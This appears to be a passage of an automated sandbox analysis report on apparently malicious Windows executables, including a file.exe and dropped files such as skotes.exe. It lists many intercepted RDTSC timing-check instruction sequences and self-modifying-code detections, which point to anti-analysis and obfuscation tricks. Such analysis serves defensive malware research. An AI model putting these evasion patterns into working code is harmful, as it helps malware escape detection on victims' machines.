Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4D50C56 second address: 4D50CB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FA6C4C2AB46h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FA6C4C2AB3Eh 0x0000001a sbb cx, EED8h 0x0000001f jmp 00007FA6C4C2AB3Bh 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 movzx esi, dx 0x0000002a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 57F6B3 second address: 57F6B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 57F6B8 second address: 57F6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 57F6BE second address: 57EEBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a cld 0x0000000b push dword ptr [ebp+122D15A1h] 0x00000011 stc 0x00000012 pushad 0x00000013 jmp 00007FA6C4D3908Bh 0x00000018 add bx, F75Ah 0x0000001d popad 0x0000001e call dword ptr [ebp+122D39F6h] 0x00000024 pushad 0x00000025 xor dword ptr [ebp+122D1CE9h], esi 0x0000002b xor eax, eax 0x0000002d clc 0x0000002e mov edx, dword ptr [esp+28h] 0x00000032 pushad 0x00000033 mov edx, dword ptr [ebp+122D3B0Ch] 0x00000039 jmp 00007FA6C4D39094h 0x0000003e popad 0x0000003f mov dword ptr [ebp+122D3BECh], eax 0x00000045 jbe 00007FA6C4D3908Fh 0x0000004b mov dword ptr [ebp+122D33E1h], edi 0x00000051 mov esi, 0000003Ch 0x00000056 jne 00007FA6C4D3908Ch 0x0000005c mov dword ptr [ebp+122D1DDCh], esi 0x00000062 add esi, dword ptr [esp+24h] 0x00000066 sub dword ptr [ebp+122D1CE9h], esi 0x0000006c lodsw 0x0000006e stc 0x0000006f add eax, dword ptr [esp+24h] 0x00000073 jc 00007FA6C4D390A3h 0x00000079 jg 00007FA6C4D3909Dh 0x0000007f jmp 00007FA6C4D39093h 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 jmp 00007FA6C4D3908Ch 0x0000008d pushad 0x0000008e mov cl, BCh 0x00000090 popad 0x00000091 nop 0x00000092 push eax 0x00000093 push edx 0x00000094 jmp 00007FA6C4D3908Fh 0x00000099 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 57EEBC second address: 57EED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6C4C2AB40h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 700B3B second address: 700B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D39091h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 700B50 second address: 700B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 700FA5 second address: 700FD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39097h 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FA6C4D39086h 0x0000000f jmp 00007FA6C4D39093h 0x00000014 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7012A1 second address: 7012B1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7012B1 second address: 7012B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702BC2 second address: 702BCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702BCC second address: 702BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702BD0 second address: 702BD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702C53 second address: 702C6F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA6C4D39092h 0x00000008 jmp 00007FA6C4D3908Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702C6F second address: 702CE3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007FA6C4C2AB38h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 pushad 0x00000027 mov ebx, dword ptr [ebp+122D3D20h] 0x0000002d mov ax, 8586h 0x00000031 popad 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ecx 0x00000037 call 00007FA6C4C2AB38h 0x0000003c pop ecx 0x0000003d mov dword ptr [esp+04h], ecx 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc ecx 0x0000004a push ecx 0x0000004b ret 0x0000004c pop ecx 0x0000004d ret 0x0000004e push F91C063Dh 0x00000053 pushad 0x00000054 jmp 00007FA6C4C2AB45h 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702CE3 second address: 702CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702ECC second address: 702ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702ED0 second address: 702ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702F84 second address: 702F97 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA6C4C2AB38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702F97 second address: 702FED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FA6C4D39088h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D2257h], eax 0x00000029 jmp 00007FA6C4D3908Ah 0x0000002e push 00000000h 0x00000030 push 2E1B7E9Bh 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA6C4D39092h 0x0000003c rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 702FED second address: 703091 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 2E1B7E1Bh 0x00000010 movzx ecx, bx 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007FA6C4C2AB38h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000018h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f xor esi, dword ptr [ebp+122D3C80h] 0x00000035 push 00000000h 0x00000037 call 00007FA6C4C2AB42h 0x0000003c jmp 00007FA6C4C2AB45h 0x00000041 pop edi 0x00000042 push 00000003h 0x00000044 push 00000000h 0x00000046 push edx 0x00000047 call 00007FA6C4C2AB38h 0x0000004c pop edx 0x0000004d mov dword ptr [esp+04h], edx 0x00000051 add dword ptr [esp+04h], 00000019h 0x00000059 inc edx 0x0000005a push edx 0x0000005b ret 0x0000005c pop edx 0x0000005d ret 0x0000005e mov dword ptr [ebp+122D33E1h], edi 0x00000064 call 00007FA6C4C2AB39h 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 703091 second address: 703097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 703097 second address: 7030B2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA6C4C2AB40h 0x00000010 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7030B2 second address: 7030CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FA6C4D3908Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7030CF second address: 7030D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7030D4 second address: 7030DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7030DA second address: 7030FD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA6C4C2AB36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA6C4C2AB43h 0x00000015 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7030FD second address: 703102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 703102 second address: 703175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edi 0x0000000f jbe 00007FA6C4C2AB36h 0x00000015 pop edi 0x00000016 pop eax 0x00000017 pop eax 0x00000018 jmp 00007FA6C4C2AB40h 0x0000001d lea ebx, dword ptr [ebp+12457B08h] 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007FA6C4C2AB38h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 00000018h 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d mov ecx, 4EE75EFAh 0x00000042 jmp 00007FA6C4C2AB46h 0x00000047 push eax 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b jno 00007FA6C4C2AB36h 0x00000051 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7162B6 second address: 7162BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72306A second address: 72307C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA6C4C2AB3Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7231F3 second address: 7231FD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA6C4D3908Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7231FD second address: 723226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push esi 0x00000007 jng 00007FA6C4C2AB36h 0x0000000d jmp 00007FA6C4C2AB44h 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 723226 second address: 72323C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FA6C4D39086h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72323C second address: 723240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 723541 second address: 723548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 723697 second address: 72369C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72369C second address: 7236A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7236A2 second address: 7236A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248A9 second address: 7248B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248B0 second address: 7248D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA6C4C2AB36h 0x00000009 jmp 00007FA6C4C2AB43h 0x0000000e popad 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248D0 second address: 7248D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248D6 second address: 7248F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA6C4C2AB45h 0x00000010 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248F6 second address: 7248FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7248FA second address: 724904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 724904 second address: 72490E instructions: 0x00000000 rdtsc 0x00000002 js 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72490E second address: 72491A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FA6C4C2AB36h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 724C2B second address: 724C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4D3908Dh 0x00000009 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 724F6F second address: 724F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 724F75 second address: 724F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA6C4D39086h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 724F7F second address: 724F83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7293E6 second address: 7293EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72AAFF second address: 72AB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72AB05 second address: 72AB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 6E3B2A second address: 6E3B30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 6E3B30 second address: 6E3B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA6C4D39094h 0x0000000e jmp 00007FA6C4D3908Fh 0x00000013 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72CB63 second address: 72CB69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72CB69 second address: 72CB8E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D3908Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA6C4D3908Ch 0x00000014 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72CFC2 second address: 72CFC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72CFC8 second address: 72CFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4D39095h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72CFEA second address: 72CFF4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA6C4C2AB3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72BFFE second address: 72C003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72C003 second address: 72C020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6C4C2AB3Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FA6C4C2AB38h 0x00000015 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 72D329 second address: 72D342 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6C4D39086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b js 00007FA6C4D390A8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jbe 00007FA6C4D39086h 0x00000019 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 733B28 second address: 733B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 733173 second address: 73318C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA6C4D39086h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FA6C4D39086h 0x00000013 js 00007FA6C4D39086h 0x00000019 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 73318C second address: 733190 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 733190 second address: 7331D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA6C4D39086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FA6C4D39098h 0x00000014 jmp 00007FA6C4D3908Eh 0x00000019 popad 0x0000001a pushad 0x0000001b push edx 0x0000001c pop edx 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 pop edi 0x00000024 push eax 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 73339A second address: 7333BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6C4C2AB48h 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FA6C4C2AB36h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 7333BE second address: 7333C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 73366B second address: 733697 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jo 00007FA6C4C2AB36h 0x0000000f jo 00007FA6C4C2AB36h 0x00000015 popad 0x00000016 pop ebx 0x00000017 pushad 0x00000018 pushad 0x00000019 jmp 00007FA6C4C2AB3Fh 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Documents\JKECGDBFCB.exe RDTSC instruction interceptor: First address: 733697 second address: 73369D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5D815A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 600AFB instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 57EE29 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 57EF09 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 72D099 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 72BA8F instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 734510 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 57EDFA instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\JKECGDBFCB.exe Special instruction interceptor: First address: 7B47E4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D9EE29 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D9EF09 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F4D099 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F4BA8F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F54510 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: D9EDFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: FD47E4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Special instruction interceptor: First address: 825826 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Special instruction interceptor: First address: 9F4CA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Special instruction interceptor: First address: 9D4D6E instructions caused by: Self-modifying code
